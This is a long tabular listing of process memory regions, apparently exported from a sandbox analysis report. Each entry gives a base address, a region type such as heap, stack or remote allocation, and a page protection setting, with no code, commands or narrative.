unclassified section
|
page execute and read and write
|
||
|
6E6A000
|
heap
|
page read and write
|
||
|
3394000
|
heap
|
page read and write
|
||
|
5760000
|
unkown
|
page execute and read and write
|
||
|
C90000
|
heap
|
page read and write
|
||
|
698D0000
|
unkown
|
page write copy
|
||
|
6AA0B000
|
unkown
|
page read and write
|
||
|
694D0000
|
unkown
|
page readonly
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
909000
|
heap
|
page read and write
|
||
|
877000
|
unkown
|
page readonly
|
||
|
86E000
|
unkown
|
page readonly
|
||
|
6867B000
|
unkown
|
page write copy
|
||
|
8DC000
|
heap
|
page read and write
|
||
|
6A931000
|
unkown
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
4B9000
|
stack
|
page read and write
|
||
|
3E7E000
|
unkown
|
page read and write
|
||
|
33B4000
|
heap
|
page read and write
|
||
|
6AA09000
|
unkown
|
page write copy
|
||
|
B1E000
|
stack
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
6EA8000
|
heap
|
page read and write
|
||
|
27F77150000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3351000
|
heap
|
page read and write
|
||
|
6A75F000
|
unkown
|
page read and write
|
||
|
6CD0000
|
trusted library allocation
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
1050000
|
heap
|
page read and write
|
||
|
4CDC000
|
unclassified section
|
page read and write
|
||
|
6AA84000
|
unkown
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
69416000
|
unkown
|
page write copy
|
||
|
6A9EF000
|
unkown
|
page write copy
|
||
|
6A2B0000
|
unkown
|
page readonly
|
||
|
3921000
|
heap
|
page read and write
|
||
|
33E9000
|
heap
|
page read and write
|
||
|
6AA1D000
|
unkown
|
page read and write
|
||
|
694D4000
|
unkown
|
page write copy
|
||
|
2F94000
|
heap
|
page read and write
|
||
|
8C4000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
5475000
|
heap
|
page read and write
|
||
|
20C0C000
|
stack
|
page read and write
|
||
|
904000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
32F8000
|
stack
|
page read and write
|
||
|
8BD000
|
heap
|
page read and write
|
||
|
376E000
|
stack
|
page read and write
|
||
|
5000000
|
unclassified section
|
page read and write
|
||
|
54AE000
|
heap
|
page read and write
|
||
|
8BD000
|
heap
|
page read and write
|
||
|
69981000
|
unkown
|
page read and write
|
||
|
6866B000
|
unkown
|
page read and write
|
||
|
6A9C8000
|
unkown
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3098000
|
unkown
|
page read and write
|
||
|
6AA14000
|
unkown
|
page write copy
|
||
|
22BE0000
|
unclassified section
|
page execute and read and write
|
||
|
32FD000
|
stack
|
page read and write
|
||
|
691E0000
|
unkown
|
page readonly
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
710000
|
heap
|
page read and write
|
||
|
23FE0000
|
unclassified section
|
page execute and read and write
|
||
|
3C10000
|
trusted library allocation
|
page read and write
|
||
|
6A789000
|
unkown
|
page write copy
|
||
|
6BDE6000
|
unkown
|
page readonly
|
||
|
8B70000
|
heap
|
page read and write
|
||
|
904000
|
heap
|
page read and write
|
||
|
8F7000
|
heap
|
page read and write
|
||
|
6A5D0000
|
unkown
|
page readonly
|
||
|
6A918000
|
unkown
|
page read and write
|
||
|
8137000
|
stack
|
page read and write
|
||
|
30A2000
|
unkown
|
page read and write
|
||
|
B90000
|
unkown
|
page readonly
|
||
|
40B000
|
unkown
|
page write copy
|
||
|
6A734000
|
unkown
|
page read and write
|
||
|
2092D000
|
stack
|
page read and write
|
||
|
6A0F5000
|
unkown
|
page readonly
|
||
|
20470000
|
direct allocation
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
30000
|
heap
|
page read and write
|
||
|
204B0000
|
direct allocation
|
page read and write
|
||
|
7090000
|
heap
|
page execute and read and write
|
||
|
830F000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
6A626000
|
unkown
|
page write copy
|
||
|
3921000
|
heap
|
page read and write
|
||
|
6A9FB000
|
unkown
|
page read and write
|
||
|
8E4000
|
heap
|
page read and write
|
||
|
8DF000
|
heap
|
page read and write
|
||
|
691E3000
|
unkown
|
page write copy
|
||
|
6A764000
|
unkown
|
page write copy
|
||
|
41A2000
|
unkown
|
page read and write
|
||
|
27F76F28000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3417000
|
heap
|
page read and write
|
||
|
2F54000
|
heap
|
page read and write
|
||
|
9B9000
|
heap
|
page read and write
|
||
|
6A2D0000
|
unkown
|
page execute read
|
||
|
687B4000
|
unkown
|
page execute read
|
||
|
54AA000
|
heap
|
page read and write
|
||
|
6940000
|
direct allocation
|
page read and write
|
||
|
930000
|
trusted library allocation
|
page read and write
|
||
|
10F0000
|
heap
|
page read and write
|
||
|
20EA0000
|
heap
|
page read and write
|
||
|
20500000
|
direct allocation
|
page read and write
|
||
|
1277000
|
heap
|
page read and write
|
||
|
5487000
|
heap
|
page read and write
|
||
|
341E000
|
heap
|
page read and write
|
||
|
27F76D80000
|
system
|
page execute and read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
3921000
|
heap
|
page read and write
|
||
|
6872A000
|
unkown
|
page write copy
|
||
|
5AB000
|
unkown
|
page readonly
|
||
|
6A99F000
|
unkown
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
86E000
|
unkown
|
page readonly
|
||
|
5E22000
|
unclassified section
|
page read and write
|
||
|
54AA000
|
heap
|
page read and write
|
||
|
209EE000
|
stack
|
page read and write
|
||
|
10E0000
|
unkown
|
page readonly
|
||
|
10C0000
|
unkown
|
page read and write
|
||
|
2DF0000
|
heap
|
page read and write
|
||
|
2D4D000
|
heap
|
page read and write
|
||
|
69219000
|
unkown
|
page write copy
|
||
|
6A721000
|
unkown
|
page write copy
|
||
|
909000
|
heap
|
page read and write
|
||
|
6A915000
|
unkown
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
340F000
|
stack
|
page read and write
|
||
|
89D000
|
heap
|
page read and write
|
||
|
33BE000
|
heap
|
page read and write
|
||
|
4770000
|
heap
|
page execute and read and write
|
||
|
5492000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
10C0000
|
unkown
|
page read and write
|
||
|
990000
|
trusted library allocation
|
page read and write
|
||
|
20EF3000
|
heap
|
page read and write
|
||
|
683E000
|
stack
|
page read and write
|
||
|
887A000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
55B0000
|
heap
|
page read and write
|
||
|
33B8000
|
heap
|
page read and write
|
||
|
39D6000
|
heap
|
page read and write
|
||
|
33BE000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
5489000
|
heap
|
page read and write
|
||
|
1660000
|
remote allocation
|
page execute and read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
6A869000
|
unkown
|
page read and write
|
||
|
861000
|
unkown
|
page execute read
|
||
|
2C90000
|
unkown
|
page read and write
|
||
|
2F50000
|
heap
|
page read and write
|
||
|
698D6000
|
unkown
|
page write copy
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
313E000
|
stack
|
page read and write
|
||
|
5EA000
|
unkown
|
page execute read
|
||
|
2E20000
|
unkown
|
page readonly
|
||
|
116E000
|
unkown
|
page read and write
|
||
|
1860000
|
unkown
|
page readonly
|
||
|
917000
|
heap
|
page read and write
|
||
|
6AA1A000
|
unkown
|
page write copy
|
||
|
409000
|
unkown
|
page readonly
|
||
|
2D3E000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
6A879000
|
unkown
|
page read and write
|
||
|
4781000
|
trusted library allocation
|
page read and write
|
||
|
863D000
|
stack
|
page read and write
|
||
|
2102C000
|
stack
|
page read and write
|
||
|
687B3000
|
unkown
|
page read and write
|
||
|
690CF000
|
unkown
|
page execute read
|
||
|
6A627000
|
unkown
|
page read and write
|
||
|
909000
|
heap
|
page read and write
|
||
|
4092000
|
unclassified section
|
page read and write
|
||
|
698AC000
|
unkown
|
page write copy
|
||
|
81E0000
|
trusted library allocation
|
page read and write
|
||
|
13F6000
|
system
|
page execute and read and write
|
||
|
8870000
|
heap
|
page read and write
|
||
|
3F6C000
|
remote allocation
|
page execute and read and write
|
||
|
861000
|
unkown
|
page execute read
|
||
|
6A948000
|
unkown
|
page write copy
|
||
|
5789000
|
trusted library allocation
|
page read and write
|
||
|
6869B000
|
unkown
|
page write copy
|
||
|
708E000
|
stack
|
page read and write
|
||
|
2F60000
|
unkown
|
page execute and read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
1040000
|
unkown
|
page read and write
|
||
|
68721000
|
unkown
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
68777000
|
unkown
|
page write copy
|
||
|
8E4000
|
heap
|
page read and write
|
||
|
5580000
|
direct allocation
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
4360000
|
unkown
|
page execute and read and write
|
||
|
2F10000
|
unkown
|
page readonly
|
||
|
30000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
88DD000
|
heap
|
page read and write
|
||
|
6A763000
|
unkown
|
page read and write
|
||
|
6A3CF000
|
unkown
|
page readonly
|
||
|
6970000
|
direct allocation
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
409000
|
unkown
|
page readonly
|
||
|
6A920000
|
unkown
|
page read and write
|
||
|
88A3000
|
heap
|
page read and write
|
||
|
EFC000
|
stack
|
page read and write
|
||
|
68663000
|
unkown
|
page write copy
|
||
|
5489000
|
heap
|
page read and write
|
||
|
128F000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
2410000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
793000
|
heap
|
page read and write
|
||
|
340A000
|
heap
|
page read and write
|
||
|
1250000
|
unkown
|
page readonly
|
||
|
694DB000
|
unkown
|
page read and write
|
||
|
8FE000
|
heap
|
page read and write
|
||
|
900000
|
trusted library section
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
49B8000
|
unclassified section
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
B90000
|
unkown
|
page readonly
|
||
|
877000
|
unkown
|
page readonly
|
||
|
342A000
|
heap
|
page read and write
|
||
|
8680000
|
trusted library allocation
|
page read and write
|
||
|
5530000
|
direct allocation
|
page read and write
|
||
|
2580000
|
heap
|
page read and write
|
||
|
6BFC1000
|
unkown
|
page read and write
|
||
|
6A902000
|
unkown
|
page write copy
|
||
|
C1F000
|
stack
|
page read and write
|
||
|
6AA88000
|
unkown
|
page read and write
|
||
|
82EE000
|
heap
|
page read and write
|
||
|
2F30000
|
heap
|
page read and write
|
||
|
A78000
|
trusted library allocation
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
6A89A000
|
unkown
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
24F0000
|
heap
|
page read and write
|
||
|
27F78A09000
|
trusted library allocation
|
page read and write
|
||
|
33B2000
|
heap
|
page read and write
|
||
|
6B70000
|
heap
|
page read and write
|
||
|
691E1000
|
unkown
|
page read and write
|
||
|
2D42000
|
heap
|
page read and write
|
||
|
348F000
|
stack
|
page read and write
|
||
|
32D0000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
4E32000
|
unkown
|
page read and write
|
||
|
8871000
|
heap
|
page read and write
|
||
|
6EEC000
|
heap
|
page read and write
|
||
|
913000
|
heap
|
page read and write
|
||
|
2D4D000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
6A182000
|
unkown
|
page write copy
|
||
|
2B8E000
|
unkown
|
page read and write
|
||
|
20DCF000
|
stack
|
page read and write
|
||
|
52EF000
|
stack
|
page read and write
|
||
|
3A49000
|
heap
|
page read and write
|
||
|
2B90000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3F50000
|
direct allocation
|
page execute and read and write
|
||
|
6A6CD000
|
unkown
|
page write copy
|
||
|
84E000
|
heap
|
page read and write
|
||
|
144D000
|
system
|
page execute and read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
2BF6000
|
heap
|
page read and write
|
||
|
86A0000
|
trusted library allocation
|
page read and write
|
||
|
53F8000
|
heap
|
page read and write
|
||
|
217E0000
|
unclassified section
|
page execute and read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
6BFC0000
|
unkown
|
page readonly
|
||
|
6A824000
|
unkown
|
page write copy
|
||
|
2F20000
|
unkown
|
page read and write
|
||
|
39D6000
|
heap
|
page read and write
|
||
|
54AE000
|
heap
|
page read and write
|
||
|
686A1000
|
unkown
|
page read and write
|
||
|
69206000
|
unkown
|
page read and write
|
||
|
6AA00000
|
unkown
|
page write copy
|
||
|
33F9000
|
heap
|
page read and write
|
||
|
6980000
|
direct allocation
|
page read and write
|
||
|
940000
|
trusted library allocation
|
page read and write
|
||
|
20EF5000
|
heap
|
page read and write
|
||
|
1277000
|
heap
|
page read and write
|
||
|
6A82B000
|
unkown
|
page read and write
|
||
|
6904000
|
unkown
|
page execute and read and write
|
||
|
6A760000
|
unkown
|
page write copy
|
||
|
68F0000
|
direct allocation
|
page read and write
|
||
|
2FD0000
|
heap
|
page read and write
|
||
|
27F78BB4000
|
trusted library allocation
|
page read and write
|
||
|
6A0B1000
|
unkown
|
page read and write
|
||
|
7D71000
|
unkown
|
page execute and read and write
|
||
|
6955000
|
heap
|
page execute and read and write
|
||
|
86B0000
|
direct allocation
|
page execute and read and write
|
||
|
33AD000
|
heap
|
page read and write
|
||
|
3351000
|
heap
|
page read and write
|
||
|
33AD000
|
heap
|
page read and write
|
||
|
54AB000
|
heap
|
page read and write
|
||
|
6A8F9000
|
unkown
|
page write copy
|
||
|
20C90000
|
direct allocation
|
page read and write
|
||
|
69410000
|
unkown
|
page readonly
|
||
|
5560000
|
direct allocation
|
page read and write
|
||
|
86C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1050000
|
heap
|
page read and write
|
||
|
5499000
|
heap
|
page read and write
|
||
|
6A9AD000
|
unkown
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
69217000
|
unkown
|
page read and write
|
||
|
204A0000
|
direct allocation
|
page read and write
|
||
|
5918000
|
trusted library allocation
|
page read and write
|
||
|
39F1000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
39D0000
|
heap
|
page read and write
|
||
|
4B0E000
|
unkown
|
page read and write
|
||
|
27F78900000
|
trusted library allocation
|
page read and write
|
||
|
2F90000
|
heap
|
page read and write
|
||
|
8FA000
|
heap
|
page read and write
|
||
|
6A688000
|
unkown
|
page read and write
|
||
|
6A9C9000
|
unkown
|
page write copy
|
||
|
69891000
|
unkown
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
686B9000
|
unkown
|
page write copy
|
||
|
5477000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
27F76F50000
|
heap
|
page read and write
|
||
|
933000
|
trusted library allocation
|
page execute and read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
75F0000
|
heap
|
page read and write
|
||
|
2C30000
|
heap
|
page read and write
|
||
|
440000
|
unkown
|
page read and write
|
||
|
76E0000
|
trusted library allocation
|
page read and write
|
||
|
875000
|
unkown
|
page read and write
|
||
|
6A187000
|
unkown
|
page read and write
|
||
|
496C000
|
remote allocation
|
page execute and read and write
|
||
|
3C03000
|
heap
|
page read and write
|
||
|
6960000
|
direct allocation
|
page read and write
|
||
|
6A0B2000
|
unkown
|
page write copy
|
||
|
8FA000
|
heap
|
page read and write
|
||
|
3405000
|
heap
|
page read and write
|
||
|
6A9B1000
|
unkown
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
909000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3546000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
6A0B6000
|
unkown
|
page read and write
|
||
|
5EC000
|
unkown
|
page execute read
|
||
|
8FA000
|
heap
|
page read and write
|
||
|
20A2E000
|
stack
|
page read and write
|
||
|
A5DC000
|
direct allocation
|
page execute and read and write
|
||
|
875000
|
unkown
|
page read and write
|
||
|
A8EE7FE000
|
stack
|
page read and write
|
||
|
20EF1000
|
heap
|
page read and write
|
||
|
CFA000
|
stack
|
page read and write
|
||
|
3446000
|
heap
|
page read and write
|
||
|
687E000
|
stack
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
1250000
|
unkown
|
page readonly
|
||
|
2BDE000
|
stack
|
page read and write
|
||
|
2EFD000
|
stack
|
page read and write
|
||
|
2140E000
|
heap
|
page read and write
|
||
|
409000
|
unkown
|
page readonly
|
||
|
53AE000
|
stack
|
page read and write
|
||
|
6868C000
|
unkown
|
page write copy
|
||
|
10B0000
|
unkown
|
page readonly
|
||
|
6AAB7000
|
unkown
|
page execute read
|
||
|
47C000
|
stack
|
page read and write
|
||
|
20BCF000
|
stack
|
page read and write
|
||
|
714F000
|
stack
|
page read and write
|
||
|
3394000
|
heap
|
page read and write
|
||
|
27F78A19000
|
trusted library allocation
|
page read and write
|
||
|
9A0000
|
heap
|
page readonly
|
||
|
730000
|
heap
|
page read and write
|
||
|
391F000
|
stack
|
page read and write
|
||
|
27F76F57000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
91B000
|
heap
|
page read and write
|
||
|
20F74000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
57A9000
|
trusted library allocation
|
page read and write
|
||
|
6A99B000
|
unkown
|
page read and write
|
||
|
159C000
|
unkown
|
page read and write
|
||
|
6A71F000
|
unkown
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
2F10000
|
unkown
|
page readonly
|
||
|
3921000
|
heap
|
page read and write
|
||
|
6913B000
|
unkown
|
page readonly
|
||
|
694DD000
|
unkown
|
page execute read
|
||
|
10F0000
|
heap
|
page read and write
|
||
|
3394000
|
heap
|
page read and write
|
||
|
32D8000
|
heap
|
page read and write
|
||
|
DEE000
|
stack
|
page read and write
|
||
|
6AA20000
|
unkown
|
page write copy
|
||
|
547B000
|
heap
|
page read and write
|
||
|
69224000
|
unkown
|
page read and write
|
||
|
6A822000
|
unkown
|
page write copy
|
||
|
3921000
|
heap
|
page read and write
|
||
|
20B8E000
|
stack
|
page read and write
|
||
|
887F000
|
heap
|
page read and write
|
||
|
6A868000
|
unkown
|
page write copy
|
||
|
83D000
|
heap
|
page read and write
|
||
|
5550000
|
direct allocation
|
page read and write
|
||
|
88B3000
|
heap
|
page read and write
|
||
|
710E000
|
stack
|
page read and write
|
||
|
436000
|
unkown
|
page read and write
|
||
|
5648000
|
unclassified section
|
page read and write
|
||
|
2D60000
|
unkown
|
page readonly
|
||
|
6A5EF000
|
unkown
|
page write copy
|
||
|
3434000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
6A2C6000
|
unkown
|
page write copy
|
||
|
686A5000
|
unkown
|
page write copy
|
||
|
83D9000
|
heap
|
page read and write
|
||
|
6DAE000
|
stack
|
page read and write
|
||
|
C90000
|
heap
|
page read and write
|
||
|
3530000
|
heap
|
page read and write
|
||
|
6A8A0000
|
unkown
|
page read and write
|
||
|
5590000
|
direct allocation
|
page read and write
|
||
|
6EE000
|
stack
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
69412000
|
unkown
|
page write copy
|
||
|
7F030000
|
trusted library allocation
|
page execute and read and write
|
||
|
10B0000
|
unkown
|
page readonly
|
||
|
8F7000
|
heap
|
page read and write
|
||
|
68674000
|
unkown
|
page read and write
|
||
|
467C000
|
stack
|
page read and write
|
||
|
A8EDFFE000
|
stack
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
2F94000
|
heap
|
page read and write
|
||
|
83F000
|
heap
|
page read and write
|
||
|
2FCD000
|
stack
|
page read and write
|
||
|
6A91B000
|
unkown
|
page write copy
|
||
|
20490000
|
direct allocation
|
page read and write
|
||
|
8B6000
|
heap
|
page read and write
|
||
|
32FF000
|
stack
|
page read and write
|
||
|
6A71E000
|
unkown
|
page write copy
|
||
|
6BFCF000
|
unkown
|
page write copy
|
||
|
20EF5000
|
heap
|
page read and write
|
||
|
1060000
|
unkown
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
6A99C000
|
unkown
|
page write copy
|
||
|
3921000
|
heap
|
page read and write
|
||
|
54AA000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
91A000
|
heap
|
page read and write
|
||
|
8150000
|
trusted library allocation
|
page read and write
|
||
|
25F0000
|
heap
|
page read and write
|
||
|
6A722000
|
unkown
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
6A2B6000
|
unkown
|
page write copy
|
||
|
3921000
|
heap
|
page read and write
|
||
|
8FA000
|
heap
|
page read and write
|
||
|
58E000
|
stack
|
page read and write
|
||
|
87DC000
|
direct allocation
|
page execute and read and write
|
||
|
3F4C000
|
direct allocation
|
page execute and read and write
|
||
|
950000
|
heap
|
page read and write
|
||
|
6A5F4000
|
unkown
|
page write copy
|
||
|
3921000
|
heap
|
page read and write
|
||
|
6C045000
|
unkown
|
page readonly
|
||
|
88F1000
|
heap
|
page read and write
|
||
|
6A916000
|
unkown
|
page write copy
|
||
|
347E000
|
heap
|
page read and write
|
||
|
909000
|
heap
|
page read and write
|
||
|
6BFC9000
|
unkown
|
page read and write
|
||
|
69893000
|
unkown
|
page write copy
|
||
|
69B0000
|
direct allocation
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
497C000
|
unkown
|
page read and write
|
||
|
828000
|
heap
|
page read and write
|
||
|
8DF000
|
heap
|
page read and write
|
||
|
6A876000
|
unkown
|
page read and write
|
||
|
861000
|
unkown
|
page execute read
|
||
|
6E95000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
344F000
|
heap
|
page read and write
|
||
|
3C07000
|
heap
|
page read and write
|
||
|
6EF7000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
747000
|
heap
|
page read and write
|
||
|
76C0000
|
trusted library allocation
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
30FC000
|
unkown
|
page read and write
|
||
|
909000
|
heap
|
page read and write
|
||
|
33A7000
|
heap
|
page read and write
|
||
|
12A6000
|
heap
|
page read and write
|
||
|
33F1000
|
heap
|
page read and write
|
||
|
6A92F000
|
unkown
|
page write copy
|
||
|
2F60000
|
heap
|
page read and write
|
||
|
5EE000
|
unkown
|
page execute read
|
||
|
3836000
|
unkown
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
2C80000
|
unkown
|
page readonly
|
||
|
68650000
|
unkown
|
page readonly
|
||
|
31FF000
|
unkown
|
page read and write
|
||
|
8C7000
|
heap
|
page read and write
|
||
|
20E20000
|
remote allocation
|
page read and write
|
||
|
68666000
|
unkown
|
page read and write
|
||
|
85F000
|
heap
|
page read and write
|
||
|
6A5D1000
|
unkown
|
page read and write
|
||
|
5324000
|
unclassified section
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
1A00000
|
unkown
|
page readonly
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3C80000
|
direct allocation
|
page execute and read and write
|
||
|
21130000
|
direct allocation
|
page read and write
|
||
|
6BFC7000
|
unkown
|
page read and write
|
||
|
8876000
|
heap
|
page read and write
|
||
|
3AD0000
|
trusted library allocation
|
page read and write
|
||
|
6BFD1000
|
unkown
|
page read and write
|
||
|
2B3F000
|
stack
|
page read and write
|
||
|
20CFE000
|
stack
|
page read and write
|
||
|
176C000
|
remote allocation
|
page execute and read and write
|
||
|
19A000
|
stack
|
page read and write
|
||
|
3910000
|
heap
|
page read and write
|
||
|
5487000
|
heap
|
page read and write
|
||
|
8F7000
|
heap
|
page read and write
|
||
|
15E0000
|
stack
|
page read and write
|
||
|
69426000
|
unkown
|
page execute read
|
||
|
3921000
|
heap
|
page read and write
|
||
|
8867000
|
heap
|
page read and write
|
||
|
686A2000
|
unkown
|
page write copy
|
||
|
6A792000
|
unkown
|
page write copy
|
||
|
6A669000
|
unkown
|
page read and write
|
||
|
6A94C000
|
unkown
|
page read and write
|
||
|
AF0000
|
heap
|
page read and write
|
||
|
10D0000
|
heap
|
page read and write
|
||
|
6869C000
|
unkown
|
page read and write
|
||
|
20E20000
|
remote allocation
|
page read and write
|
||
|
904000
|
heap
|
page read and write
|
||
|
34AE000
|
stack
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
7467000
|
trusted library allocation
|
page read and write
|
||
|
5265000
|
heap
|
page read and write
|
||
|
4CA0000
|
unkown
|
page read and write
|
||
|
BE1000
|
unkown
|
page readonly
|
||
|
691B5000
|
unkown
|
page execute read
|
||
|
2D41000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
3542000
|
heap
|
page read and write
|
||
|
7700000
|
trusted library allocation
|
page read and write
|
||
|
69204000
|
unkown
|
page write copy
|
||
|
20860000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
71000
|
heap
|
page read and write
|
||
|
356C000
|
remote allocation
|
page execute and read and write
|
||
|
20C80000
|
direct allocation
|
page read and write
|
||
|
86E000
|
unkown
|
page readonly
|
||
|
212E1000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
6AA85000
|
unkown
|
page write copy
|
||
|
6AA13000
|
unkown
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
54DC000
|
heap
|
page read and write
|
||
|
53EE000
|
stack
|
page read and write
|
||
|
2125B000
|
heap
|
page read and write
|
||
|
21760000
|
direct allocation
|
page execute and read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
27F78A1C000
|
trusted library allocation
|
page read and write
|
||
|
CFA000
|
stack
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3A20000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
6A687000
|
unkown
|
page write copy
|
||
|
6E86000
|
heap
|
page read and write
|
||
|
98000
|
stack
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
39E0000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
1060000
|
unkown
|
page read and write
|
||
|
740000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
6AA0E000
|
unkown
|
page read and write
|
||
|
686B8000
|
unkown
|
page read and write
|
||
|
6F8E000
|
stack
|
page read and write
|
||
|
718E000
|
stack
|
page read and write
|
||
|
A8ED7FD000
|
stack
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
7BE000
|
stack
|
page read and write
|
||
|
6A788000
|
unkown
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
6A861000
|
unkown
|
page read and write
|
||
|
204F0000
|
direct allocation
|
page read and write
|
||
|
5499000
|
heap
|
page read and write
|
||
|
6DB86000
|
unkown
|
page readonly
|
||
|
8FE000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
88E000
|
stack
|
page read and write
|
||
|
3520000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
8DF000
|
heap
|
page read and write
|
||
|
10F5000
|
heap
|
page read and write
|
||
|
6A5D3000
|
unkown
|
page write copy
|
||
|
6A9B2000
|
unkown
|
page write copy
|
||
|
6A5E9000
|
unkown
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
13D2000
|
system
|
page execute and read and write
|
||
|
6868A000
|
unkown
|
page read and write
|
||
|
917000
|
heap
|
page read and write
|
||
|
13EA000
|
system
|
page execute and read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
5487000
|
heap
|
page read and write
|
||
|
68D0000
|
direct allocation
|
page read and write
|
||
|
31B0000
|
heap
|
page read and write
|
||
|
20D8E000
|
stack
|
page read and write
|
||
|
88AC000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
AF0000
|
heap
|
page read and write
|
||
|
88E000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
6A5F5000
|
unkown
|
page read and write
|
||
|
6AA18000
|
unkown
|
page write copy
|
||
|
6AA5A000
|
unkown
|
page read and write
|
||
|
6AA11000
|
unkown
|
page write copy
|
||
|
904000
|
heap
|
page read and write
|
||
|
649000
|
unkown
|
page execute read
|
||
|
68E0000
|
direct allocation
|
page read and write
|
||
|
20E5E000
|
stack
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
